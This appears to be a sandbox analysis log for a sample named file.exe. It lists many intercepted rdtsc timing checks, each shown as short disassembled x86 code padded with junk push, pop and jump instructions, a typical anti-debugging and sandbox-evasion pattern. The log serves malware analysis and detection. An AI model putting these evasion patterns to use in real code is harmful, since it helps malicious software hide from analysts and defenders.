Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B7CDA second address: 8B7D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007F8A2CE89CA7h 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8A2CE89CA2h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B7D13 second address: 8B7D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B7D19 second address: 8B7D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B7D1E second address: 8B7D24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B7D24 second address: 8B7D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B7D28 second address: 8B7D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B7D32 second address: 8B7D36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B82E5 second address: 8B82E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B82E9 second address: 8B830F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F8A2CE89CAEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B8C3E second address: 8B8C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B8C42 second address: 8B8C51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F8A2CE89C96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B8FB5 second address: 8B8FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B8FBB second address: 8B8FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F8A2CE89CA8h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8A2CE89CA6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B8FF0 second address: 8B900B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8A2D3CFEE2h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B900B second address: 8B9011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BD639 second address: 8BD63F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BD63F second address: 8BD656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 pushad 0x00000009 jmp 00007F8A2CE89C9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BC993 second address: 8BC997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BC997 second address: 8BC9B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89C9Dh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F8A2CE89C9Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BCB0B second address: 8BCB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BCB0F second address: 8BCB25 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8A2CE89C96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F8A2CE89C9Eh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BCC2E second address: 8BCC3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jl 00007F8A2D3CFED6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BCC3E second address: 8BCC43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BD0A6 second address: 8BD0BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CB6C6 second address: 8CB6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CB6D1 second address: 8CB6E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jns 00007F8A2D3CFED6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CB6E2 second address: 8CB6E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA14A second address: 8CA14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA14E second address: 8CA160 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F8A2CE89C9Ch 0x0000000c jg 00007F8A2CE89C96h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA160 second address: 8CA183 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE3h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F8A2D3CFED6h 0x0000000f jng 00007F8A2D3CFED6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA432 second address: 8CA436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA436 second address: 8CA43C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA43C second address: 8CA459 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F8A2CE89C96h 0x00000009 jmp 00007F8A2CE89CA2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CA735 second address: 8CA739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C9519 second address: 8C951D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D1524 second address: 8D1528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D1528 second address: 8D152C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D152C second address: 8D1548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2D3CFEE6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D0FEE second address: 8D0FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D0FF4 second address: 8D1014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F8A2D3CFEE5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D1014 second address: 8D104A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F8A2CE89CA5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F8A2CE89CA8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D104A second address: 8D1050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D1050 second address: 8D1054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D11A1 second address: 8D11A6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D11A6 second address: 8D11B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D11B7 second address: 8D11BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D11BB second address: 8D11BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D11BF second address: 8D11D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8A2D3CFEDFh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D11D4 second address: 8D11F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2CE89CA5h 0x00000009 jc 00007F8A2CE89C96h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D11F3 second address: 8D1201 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8A2D3CFED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81D373 second address: 81D377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DE01B second address: 8DE03D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8A2D3CFEDAh 0x00000011 ja 00007F8A2D3CFEDCh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DE03D second address: 8DE043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2928 second address: 8E294B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8A2D3CFEDAh 0x00000008 jmp 00007F8A2D3CFEDFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E294B second address: 8E2956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2956 second address: 8E296E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2D3CFEE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EA9E1 second address: 8EA9F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8043CC second address: 8043D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8043D0 second address: 8043D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FB21E second address: 8FB223 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FB223 second address: 8FB22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8A2CE89C96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F9B39 second address: 8F9B3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F9B3F second address: 8F9B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F9B45 second address: 8F9B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEDCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F9CF4 second address: 8F9CF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F9FA5 second address: 8F9FB5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8A2D3CFEDAh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FA2BC second address: 8FA2C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8A2CE89C96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FA2C6 second address: 8FA2F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F8A2D3CFEDBh 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F8A2D3CFEE2h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FA432 second address: 8FA438 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FF4A5 second address: 8FF4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FF4AB second address: 8FF4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2CE89C9Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91B432 second address: 91B444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2D3CFEDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91EEFB second address: 91EF17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91EA4C second address: 91EA6C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8A2D3CFEE2h 0x0000000e push ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91EA6C second address: 91EA71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91EBDC second address: 91EBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91EBE2 second address: 91EBFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA3h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91EBFB second address: 91EBFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 936F21 second address: 936F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 936F25 second address: 936F55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jp 00007F8A2D3CFED6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F8A2D3CFEE5h 0x0000001b push edx 0x0000001c pop edx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 936F55 second address: 936F61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F8A2CE89C96h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 936F61 second address: 936F6F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8A2D3CFED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 936F6F second address: 936F73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93BBED second address: 93BBFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8A2D3CFED6h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93AE91 second address: 93AEB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 jnl 00007F8A2CE89C96h 0x0000000e pop ecx 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8A2CE89C9Bh 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93AFCA second address: 93AFE7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8A2D3CFED6h 0x00000008 jbe 00007F8A2D3CFED6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 ja 00007F8A2D3CFEDAh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93AFE7 second address: 93AFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93B138 second address: 93B156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2D3CFEE2h 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93B156 second address: 93B15C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93B15C second address: 93B165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93B165 second address: 93B16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93B95D second address: 93B961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93B961 second address: 93B967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93D266 second address: 93D26C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93D26C second address: 93D280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8A2CE89C9Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93D280 second address: 93D2B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jno 00007F8A2D3CFED6h 0x0000000b jmp 00007F8A2D3CFEE2h 0x00000010 jmp 00007F8A2D3CFEE1h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007F8A2D3CFED6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93FC90 second address: 93FC9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F8A2CE89C96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93FEF2 second address: 93FEF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93FEF6 second address: 93FEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94383B second address: 943840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 943840 second address: 94384E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push esi 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0E5F second address: 49E0E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
